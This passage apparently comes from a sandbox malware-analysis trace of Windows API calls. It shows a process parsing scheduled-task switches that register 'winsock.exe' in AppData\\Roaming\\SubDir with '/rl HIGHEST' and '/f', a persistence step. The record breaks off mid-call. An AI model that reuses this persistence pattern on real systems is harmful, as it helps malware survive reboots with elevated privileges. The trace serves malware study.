lstrlenW (lpString="create") returned 6 [0189.152] lstrlenW (lpString="create") returned 6 [0189.152] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.152] lstrlenW (lpString="tr") returned 2 [0189.152] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.152] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0189.152] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0189.152] lstrlenW (lpString="|create|") returned 8 [0189.152] lstrlenW (lpString="|tr|") returned 4 [0189.152] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0189.152] RtlRestoreLastWin32Error () returned 0x490 [0189.152] lstrlenW (lpString="delete") returned 6 [0189.152] lstrlenW (lpString="delete") returned 6 [0189.152] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.152] lstrlenW (lpString="tr") returned 2 [0189.152] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.152] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0189.153] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0189.153] lstrlenW (lpString="|delete|") returned 8 [0189.153] lstrlenW (lpString="|tr|") returned 4 [0189.153] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0189.153] RtlRestoreLastWin32Error () returned 0x490 [0189.153] lstrlenW (lpString="query") returned 5 [0189.153] lstrlenW (lpString="query") returned 5 [0189.153] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.153] lstrlenW (lpString="tr") returned 2 [0189.153] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.153] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0189.153] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0189.153] lstrlenW (lpString="|query|") returned 7 [0189.153] lstrlenW (lpString="|tr|") returned 4 [0189.153] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0189.154] RtlRestoreLastWin32Error () returned 0x490 [0189.154] lstrlenW (lpString="change") returned 6 [0189.154] lstrlenW (lpString="change") returned 6 [0189.154] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.154] lstrlenW (lpString="tr") returned 2 [0189.154] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.154] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0189.154] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0189.154] lstrlenW (lpString="|change|") returned 8 [0189.154] lstrlenW (lpString="|tr|") returned 4 [0189.154] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0189.154] RtlRestoreLastWin32Error () returned 0x490 [0189.154] lstrlenW (lpString="run") returned 3 [0189.154] lstrlenW (lpString="run") returned 3 [0189.154] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.154] lstrlenW (lpString="tr") returned 2 [0189.154] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.154] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0189.155] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0189.155] lstrlenW (lpString="|run|") returned 5 [0189.155] lstrlenW (lpString="|tr|") returned 4 [0189.155] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0189.155] RtlRestoreLastWin32Error () returned 0x490 [0189.155] lstrlenW (lpString="end") returned 3 [0189.155] lstrlenW (lpString="end") returned 3 [0189.155] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.155] lstrlenW (lpString="tr") returned 2 [0189.155] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.155] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0189.155] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0189.155] lstrlenW (lpString="|end|") returned 5 [0189.155] lstrlenW (lpString="|tr|") returned 4 [0189.155] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0189.155] RtlRestoreLastWin32Error () returned 0x490 [0189.155] lstrlenW (lpString="showsid") returned 7 [0189.155] lstrlenW (lpString="showsid") returned 7 [0189.156] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.156] lstrlenW (lpString="tr") returned 2 [0189.156] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.156] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0189.156] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0189.156] lstrlenW (lpString="|showsid|") returned 9 [0189.156] lstrlenW (lpString="|tr|") returned 4 [0189.156] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0189.156] RtlRestoreLastWin32Error () returned 0x490 [0189.156] RtlRestoreLastWin32Error () returned 0x490 [0189.156] RtlRestoreLastWin32Error () returned 0x0 [0189.156] lstrlenW (lpString="/tr") returned 3 [0189.156] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0189.156] RtlRestoreLastWin32Error () returned 0x490 [0189.156] RtlRestoreLastWin32Error () returned 0x0 [0189.156] lstrlenW (lpString="/tr") returned 3 [0189.156] GetProcessHeap () returned 0x4780000 [0189.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x8) returned 0x4786640 [0189.156] GetProcessHeap () returned 0x4780000 [0189.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789350 [0189.157] RtlRestoreLastWin32Error () returned 0x0 [0189.157] RtlRestoreLastWin32Error () returned 0x0 [0189.158] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.158] lstrlenW (lpString="-/") returned 2 [0189.158] StrChrIW (lpStart="-/", wMatch=0x4710043) returned 0x0 [0189.158] RtlRestoreLastWin32Error () returned 0x490 [0189.159] RtlRestoreLastWin32Error () returned 0x490 [0189.159] RtlRestoreLastWin32Error () returned 0x0 [0189.159] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.159] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe" [0189.159] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.159] GetProcessHeap () returned 0x4780000 [0189.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x4787320 [0189.159] _memicmp (_Buf1=0x4787320, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.159] GetProcessHeap () returned 0x4780000 [0189.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xc) returned 0x4787338 [0189.159] GetProcessHeap () returned 0x4780000 [0189.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x478aa08 [0189.160] _memicmp (_Buf1=0x478aa08, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.160] GetProcessHeap () returned 0x4780000 [0189.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x76) returned 0x478adb0 [0189.160] RtlRestoreLastWin32Error () returned 0x7a [0189.160] RtlRestoreLastWin32Error () returned 0x0 [0189.160] RtlRestoreLastWin32Error () returned 0x0 [0189.160] lstrlenW (lpString="C") returned 1 [0189.160] RtlRestoreLastWin32Error () returned 0x490 [0189.160] RtlRestoreLastWin32Error () returned 0x0 [0189.160] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.160] GetProcessHeap () returned 0x4780000 [0189.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x72) returned 0x478bcd8 [0189.161] GetProcessHeap () returned 0x4780000 [0189.161] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789570 [0189.161] RtlRestoreLastWin32Error () returned 0x0 [0189.161] RtlRestoreLastWin32Error () returned 0x0 [0189.161] lstrlenW (lpString="/rl") returned 3 [0189.161] lstrlenW (lpString="-/") returned 2 [0189.161] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.161] lstrlenW (lpString="?") returned 1 [0189.161] lstrlenW (lpString="?") returned 1 [0189.161] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.161] lstrlenW (lpString="rl") returned 2 [0189.161] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.161] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0189.162] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0189.162] lstrlenW (lpString="|?|") returned 3 [0189.162] lstrlenW (lpString="|rl|") returned 4 [0189.162] RtlRestoreLastWin32Error () returned 0x490 [0189.162] lstrlenW (lpString="create") returned 6 [0189.162] lstrlenW (lpString="create") returned 6 [0189.162] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.162] lstrlenW (lpString="rl") returned 2 [0189.162] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.162] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0189.162] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0189.162] lstrlenW (lpString="|create|") returned 8 [0189.162] lstrlenW (lpString="|rl|") returned 4 [0189.163] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0189.163] RtlRestoreLastWin32Error () returned 0x490 [0189.163] lstrlenW (lpString="delete") returned 6 [0189.163] lstrlenW (lpString="delete") returned 6 [0189.163] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.163] lstrlenW (lpString="rl") returned 2 [0189.163] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.163] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0189.163] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0189.163] lstrlenW (lpString="|delete|") returned 8 [0189.163] lstrlenW (lpString="|rl|") returned 4 [0189.163] StrStrIW (lpFirst="|delete|", lpSrch="|rl|") returned 0x0 [0189.163] RtlRestoreLastWin32Error () returned 0x490 [0189.163] lstrlenW (lpString="query") returned 5 [0189.164] lstrlenW (lpString="query") returned 5 [0189.164] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.164] lstrlenW (lpString="rl") returned 2 [0189.164] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.164] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0189.164] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0189.164] lstrlenW (lpString="|query|") returned 7 [0189.164] lstrlenW (lpString="|rl|") returned 4 [0189.164] StrStrIW (lpFirst="|query|", lpSrch="|rl|") returned 0x0 [0189.164] RtlRestoreLastWin32Error () returned 0x490 [0189.164] lstrlenW (lpString="change") returned 6 [0189.164] lstrlenW (lpString="change") returned 6 [0189.164] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.164] lstrlenW (lpString="rl") returned 2 [0189.164] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.164] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0189.165] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0189.165] lstrlenW (lpString="|change|") returned 8 [0189.165] lstrlenW (lpString="|rl|") returned 4 [0189.165] StrStrIW (lpFirst="|change|", lpSrch="|rl|") returned 0x0 [0189.165] RtlRestoreLastWin32Error () returned 0x490 [0189.165] lstrlenW (lpString="run") returned 3 [0189.165] lstrlenW (lpString="run") returned 3 [0189.165] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.165] lstrlenW (lpString="rl") returned 2 [0189.165] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.165] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0189.165] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0189.165] lstrlenW (lpString="|run|") returned 5 [0189.165] lstrlenW (lpString="|rl|") returned 4 [0189.165] StrStrIW (lpFirst="|run|", lpSrch="|rl|") returned 0x0 [0189.165] RtlRestoreLastWin32Error () returned 0x490 [0189.165] lstrlenW (lpString="end") returned 3 [0189.166] lstrlenW (lpString="end") returned 3 [0189.166] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.166] lstrlenW (lpString="rl") returned 2 [0189.166] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.166] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0189.166] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0189.166] lstrlenW (lpString="|end|") returned 5 [0189.166] lstrlenW (lpString="|rl|") returned 4 [0189.166] StrStrIW (lpFirst="|end|", lpSrch="|rl|") returned 0x0 [0189.166] RtlRestoreLastWin32Error () returned 0x490 [0189.166] lstrlenW (lpString="showsid") returned 7 [0189.166] lstrlenW (lpString="showsid") returned 7 [0189.166] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.166] lstrlenW (lpString="rl") returned 2 [0189.166] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.167] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0189.167] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0189.167] lstrlenW (lpString="|showsid|") returned 9 [0189.167] lstrlenW (lpString="|rl|") returned 4 [0189.167] StrStrIW (lpFirst="|showsid|", lpSrch="|rl|") returned 0x0 [0189.167] RtlRestoreLastWin32Error () returned 0x490 [0189.167] RtlRestoreLastWin32Error () returned 0x490 [0189.167] RtlRestoreLastWin32Error () returned 0x0 [0189.167] lstrlenW (lpString="/rl") returned 3 [0189.167] StrChrIW (lpStart="/rl", wMatch=0x3a) returned 0x0 [0189.167] RtlRestoreLastWin32Error () returned 0x490 [0189.167] RtlRestoreLastWin32Error () returned 0x0 [0189.167] lstrlenW (lpString="/rl") returned 3 [0189.167] GetProcessHeap () returned 0x4780000 [0189.167] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x8) returned 0x47868a8 [0189.167] GetProcessHeap () returned 0x4780000 [0189.167] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47893f0 [0189.167] RtlRestoreLastWin32Error () returned 0x0 [0189.167] RtlRestoreLastWin32Error () returned 0x0 [0189.167] lstrlenW (lpString="HIGHEST") returned 7 [0189.167] lstrlenW (lpString="-/") returned 2 [0189.168] StrChrIW (lpStart="-/", wMatch=0x4710048) returned 0x0 [0189.168] RtlRestoreLastWin32Error () returned 0x490 [0189.168] RtlRestoreLastWin32Error () returned 0x490 [0189.168] RtlRestoreLastWin32Error () returned 0x0 [0189.168] lstrlenW (lpString="HIGHEST") returned 7 [0189.168] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0189.168] RtlRestoreLastWin32Error () returned 0x490 [0189.168] RtlRestoreLastWin32Error () returned 0x0 [0189.168] lstrlenW (lpString="HIGHEST") returned 7 [0189.168] GetProcessHeap () returned 0x4780000 [0189.168] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x478abb8 [0189.168] GetProcessHeap () returned 0x4780000 [0189.168] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47895f0 [0189.168] RtlRestoreLastWin32Error () returned 0x0 [0189.168] RtlRestoreLastWin32Error () returned 0x0 [0189.168] lstrlenW (lpString="/f") returned 2 [0189.168] lstrlenW (lpString="-/") returned 2 [0189.168] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.168] lstrlenW (lpString="?") returned 1 [0189.168] lstrlenW (lpString="?") returned 1 [0189.169] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.169] lstrlenW (lpString="f") returned 1 [0189.169] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.169] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0189.169] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0189.169] lstrlenW (lpString="|?|") returned 3 [0189.169] lstrlenW (lpString="|f|") returned 3 [0189.169] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0 [0189.169] RtlRestoreLastWin32Error () returned 0x490 [0189.169] lstrlenW (lpString="create") returned 6 [0189.169] lstrlenW (lpString="create") returned 6 [0189.169] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.169] lstrlenW (lpString="f") returned 1 [0189.169] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.170] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0189.170] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0189.170] lstrlenW (lpString="|create|") returned 8 [0189.170] lstrlenW (lpString="|f|") returned 3 [0189.170] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0 [0189.170] RtlRestoreLastWin32Error () returned 0x490 [0189.170] lstrlenW (lpString="delete") returned 6 [0189.170] lstrlenW (lpString="delete") returned 6 [0189.170] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.170] lstrlenW (lpString="f") returned 1 [0189.170] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.170] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0189.170] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0189.171] lstrlenW (lpString="|delete|") returned 8 [0189.171] lstrlenW (lpString="|f|") returned 3 [0189.171] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0 [0189.171] RtlRestoreLastWin32Error () returned 0x490 [0189.171] lstrlenW (lpString="query") returned 5 [0189.171] lstrlenW (lpString="query") returned 5 [0189.171] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.171] lstrlenW (lpString="f") returned 1 [0189.171] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.171] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0189.171] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0189.171] lstrlenW (lpString="|query|") returned 7 [0189.172] lstrlenW (lpString="|f|") returned 3 [0189.172] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0 [0189.172] RtlRestoreLastWin32Error () returned 0x490 [0189.172] lstrlenW (lpString="change") returned 6 [0189.172] lstrlenW (lpString="change") returned 6 [0189.172] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.172] lstrlenW (lpString="f") returned 1 [0189.172] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.172] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0189.172] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0189.172] lstrlenW (lpString="|change|") returned 8 [0189.172] lstrlenW (lpString="|f|") returned 3 [0189.172] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0 [0189.172] RtlRestoreLastWin32Error () returned 0x490 [0189.172] lstrlenW (lpString="run") returned 3 [0189.172] lstrlenW (lpString="run") returned 3 [0189.173] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.173] lstrlenW (lpString="f") returned 1 [0189.173] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.173] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0189.173] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0189.173] lstrlenW (lpString="|run|") returned 5 [0189.173] lstrlenW (lpString="|f|") returned 3 [0189.173] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0 [0189.173] RtlRestoreLastWin32Error () returned 0x490 [0189.173] lstrlenW (lpString="end") returned 3 [0189.173] lstrlenW (lpString="end") returned 3 [0189.173] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.174] lstrlenW (lpString="f") returned 1 [0189.174] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.174] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0189.174] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0189.174] lstrlenW (lpString="|end|") returned 5 [0189.174] lstrlenW (lpString="|f|") returned 3 [0189.174] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0 [0189.174] RtlRestoreLastWin32Error () returned 0x490 [0189.174] lstrlenW (lpString="showsid") returned 7 [0189.174] lstrlenW (lpString="showsid") returned 7 [0189.174] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.174] lstrlenW (lpString="f") returned 1 [0189.174] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.174] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0189.174] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0189.174] lstrlenW (lpString="|showsid|") returned 9 [0189.174] lstrlenW (lpString="|f|") returned 3 [0189.175] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0 [0189.175] RtlRestoreLastWin32Error () returned 0x490 [0189.175] RtlRestoreLastWin32Error () returned 0x490 [0189.175] RtlRestoreLastWin32Error () returned 0x0 [0189.175] lstrlenW (lpString="/f") returned 2 [0189.175] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0 [0189.175] RtlRestoreLastWin32Error () returned 0x490 [0189.175] RtlRestoreLastWin32Error () returned 0x0 [0189.175] lstrlenW (lpString="/f") returned 2 [0189.175] GetProcessHeap () returned 0x4780000 [0189.175] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x6) returned 0x4786bb8 [0189.175] GetProcessHeap () returned 0x4780000 [0189.175] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47895b0 [0189.175] RtlRestoreLastWin32Error () returned 0x0 [0189.175] GetProcessHeap () returned 0x4780000 [0189.175] GetProcessHeap () returned 0x4780000 [0189.175] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786c78) returned 1 [0189.175] GetProcessHeap () returned 0x4780000 [0189.175] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786c78) returned 0x8 [0189.176] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786c78) returned 1 [0189.176] GetProcessHeap () returned 0x4780000 [0189.176] GetProcessHeap () returned 0x4780000 [0189.176] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789550) returned 1 [0189.176] GetProcessHeap () returned 0x4780000 [0189.176] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789550) returned 0x14 [0189.176] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789550) returned 1 [0189.176] GetProcessHeap () returned 0x4780000 [0189.176] GetProcessHeap () returned 0x4780000 [0189.176] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4788fc8) returned 1 [0189.176] GetProcessHeap () returned 0x4780000 [0189.176] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4788fc8) returned 0x22 [0189.176] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4788fc8) returned 1 [0189.176] GetProcessHeap () returned 0x4780000 [0189.176] GetProcessHeap () returned 0x4780000 [0189.177] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47893b0) returned 1 [0189.177] GetProcessHeap () returned 0x4780000 [0189.177] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47893b0) returned 0x14 [0189.177] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47893b0) returned 1 [0189.177] GetProcessHeap () returned 0x4780000 [0189.177] GetProcessHeap () returned 0x4780000 [0189.177] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47827e8) returned 1 [0189.177] GetProcessHeap () returned 0x4780000 [0189.177] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47827e8) returned 0x8 [0189.177] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47827e8) returned 1 [0189.177] GetProcessHeap () returned 0x4780000 [0189.177] GetProcessHeap () returned 0x4780000 [0189.177] HeapValidate (hHeap=0x4780000, 